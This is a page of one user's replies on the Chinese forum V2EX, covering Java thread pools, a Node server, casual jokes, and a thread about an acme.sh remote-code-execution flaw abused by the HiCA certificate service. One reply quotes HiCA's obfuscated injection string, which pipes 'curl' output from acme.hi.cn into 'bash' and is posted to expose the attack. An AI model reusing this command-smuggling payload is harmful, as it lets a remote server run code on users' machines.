V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
V2EX  ›  xiangyuecn  ›  全部回复第 26 页 / 共 123 页
回复总数  2441
1 ... 22  23  24  25  26  27  28  29  30  31 ... 123  
2023-06-10 11:20:13 +08:00
回复了 baobao1270 创建的主题 信息安全 acme.sh 存在 RCE 漏洞,已经被国产 HiCA 利用
@yzc27 #41 不会的,这个网页特意做成的一个单一文件,包括图标都是内嵌的;申请证书过程中请求的接口数据,可以按 F12 打开浏览器控制台查 Network 面板里面看得到,只会给选定的 ACME 接口发送数据;其中使用到的私钥只用于数据签名,私钥内容不会发送给任何人。
2023-06-10 10:34:36 +08:00
回复了 baobao1270 创建的主题 信息安全 acme.sh 存在 RCE 漏洞,已经被国产 HiCA 利用
@yzc27 #39 这种流程,直接用我的网页版吧,简单省事。顺势再推广一波😂

HTML5 网页版 ACME 客户端:只需在现代浏览器上操作即可获得 PEM 格式纯文本的域名证书,不依赖操作系统环境,无需下载和安装软件,纯手动操作,只专注于申请获得证书这一件事] https://xiangyuecn.gitee.io/acme-html-web-browser-client/ACME-HTML-Web-Browser-Client.html

相对于 shell 脚本、可执行二进制程序,浏览器端的程序天然可以简单的做到:源码可控、流量可审查,缺点也很明显 没法自动化。
2023-06-09 23:04:11 +08:00
回复了 lechuanad 创建的主题 分享创造 全网效果最好的小红书文案内容生成器升级了
AI 爆火的背后,卖铲子和牛仔裤的首先暴富
2023-06-09 22:47:42 +08:00
回复了 Arcy 创建的主题 问与答 500 块能够做些什么?
加 20 ,转给你妈妈,周末回家至少能吃半年红烧肉😄
2023-06-09 22:37:59 +08:00
回复了 layxy 创建的主题 Java Java 执行大量长耗时接口,怎么使用单机处理
ThreadPoolExecutor 线程池处理机制:
1. 新任务进入核心线程执行(核心线程默认不回收)
2. 核心线程数据量满了,放到队列等待
3. 队列 TMD 也满了,开新线程处理,直到线程数量达到最大线程数(这种线程会回收)


我一直没明白,这玩意到底是哪里会用到这破逻辑,最大线程数有个卵用啊😂

按我的脑回路,应该是核心线程满了,就开新线程,直到最大线程数,最大线程满了就放队列等待
2023-06-09 22:14:27 +08:00
回复了 dropdatabase 创建的主题 问与答 不锈钢冰粒值得买吗
@kkwa56188 嗦丢儿?一人嗦一下,反复使用,一本万利
2023-06-09 21:52:28 +08:00
回复了 baobao1270 创建的主题 信息安全 acme.sh 存在 RCE 漏洞,已经被国产 HiCA 利用
我网的问题,刚又打开了他们的网站。。哈

接上面,填写了他们的 ACME 地址后,会提示跨域了,直接打开他们的 acme 服务地址打开控制台,然后执行一下页面代码,就能开始申请证书了,验证域名所有权的时候,切换到“文件 URL 验证”,就能看到:


http://asdfas123.com/.well-known/acme-challenge/dd#acme.hi.cn/acme/v2/precheck-http/109651/179551#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/109651/179551?o=$_w|bash)#
2023-06-09 21:31:42 +08:00
回复了 baobao1270 创建的主题 信息安全 acme.sh 存在 RCE 漏洞,已经被国产 HiCA 利用
我说呢,去年就发现了,这家的 ACME 接口返回的内容是命令行脚本,没法正常通过 ACME 客户端去申请证书,如果要干坏事是迟早的事

------------------

快速在线验证: https://xiangyuecn.gitee.io/acme-html-web-browser-client/ACME-HTML-Web-Browser-Client.html

打开《 HTML5 网页版 ACME 客户端后》,手动填写 ACME 地址: https://acme.hi.cn/directory ,然后随便填个域名和邮箱,点击创建两个密钥,然后就能看到 HiCA 返回的命令行文本了

刚才测试了一下,acme.hi.cn 域名解析都没了,秒关了吗 还是我的网有问题😅
2023-06-06 11:12:38 +08:00
回复了 t298 创建的主题 问与答 我有一个项目架构的问题。
什么微服务不微服务 关系不大,统统面向 ctrl+c ctrl+v 编程,后面要是还来一个新客户 再复制一份,问题解决
2023-06-06 11:04:32 +08:00
回复了 javak 创建的主题 Java Java 出活真的快吗
@zjsxwc #29 估计是很多代码单独放到了一个文件里面的缘故吧,一个文件的几行代码,看一段逻辑点开几十个文件😂

欢迎围观我的一个 java 开源库:高性能的坐标数据、边界数据查询工具,Java 开源程序、带 http 查询接口,内存占用低( 1 秒可查 1 万个以上坐标对应的城市信息)
https://github.com/xiangyuecn/AreaCity-Query-Geometry

源码直接丢在根目录裸奔,里面有个命令行文件 直接编译运行,代码全丢在一个 java 文件里面 打开阅读无文件切换压力

估计没几个人会和我一样这样写 java 程序了😅
2023-06-06 10:55:36 +08:00
回复了 javak 创建的主题 Java Java 出活真的快吗
SpringBoot 最野蛮情况下,只需打包出一个 jar ,有 jdk 就能跑,内置 tomcat 自己玩(包括静态路径处理,https )

nginx 、依赖安装 这些玩意都全可以省了,一个 jar 搞定,,😂
2023-06-03 21:20:42 +08:00
回复了 waytodelay 创建的主题 优惠信息 150g 芙丽芳丝 80 左右一支
80 块,按现价可以买 8 斤五花肉😅
2023-06-03 21:12:26 +08:00
回复了 dadapipi 创建的主题 程序员 有没有在用阿里云盘相册的大佬 图片时间变成下载时间了
iOS 相机真棒
2023-06-03 20:47:53 +08:00
回复了 dadapipi 创建的主题 程序员 有没有在用阿里云盘相册的大佬 图片时间变成下载时间了
文件名存储时间日期
2023-06-03 20:43:26 +08:00
回复了 x77 创建的主题 程序员 求推荐个 nodejs rest api 服务器的方案
var http = require('http');
var https = require('https');

http.createServer(...).listen(80);
https.createServer(...).listen(443);

专业且绝对成熟
2023-06-03 19:13:46 +08:00
回复了 sickoo 创建的主题 问与答 有点算懵圈了,十天用了 100 度电
空调 0.2kwh ?你按空调 1 小时 1 度电来算,问题就简单明了了

( 100 小时 20 度电,这空调真懂事😅😅😅)
2023-06-03 18:45:01 +08:00
回复了 yuanyuandeqiu 创建的主题 问与答 Java 线程池参数设置
io 多就多开线程,搞个 100 线程,对其他程序没什么干扰

cpu 多就搞 4 线程,随时 yield()一下,让出 cpu
2023-05-31 21:26:01 +08:00
回复了 gps32251070 创建的主题 程序员 关于面试 MySQL 的疑问
什么负载不负载的,加钱皆可解决🐶 所以,原因是钱给少了
2023-05-15 21:53:01 +08:00
回复了 ramdava 创建的主题 问与答 [R.I.P] 作为高危行业程序猿(媛),我们如何规避猝死风险?
一命二。。 算啦
2023-05-02 11:31:50 +08:00
回复了 humbass 创建的主题 程序员 有没有人跟我一样偏好原生 JS 写项目,而不是 TS
写 c++ ,编译成 js
1 ... 22  23  24  25  26  27  28  29  30  31 ... 123  
关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   5591 人在线   最高记录 6679   ·     Select Language
创意工作者们的社区
World is powered by solitude
VERSION: 3.9.8.5 · 40ms · UTC 06:51 · PVG 14:51 · LAX 22:51 · JFK 01:51
Developed with CodeLauncher
♥ Do have faith in what you're doing.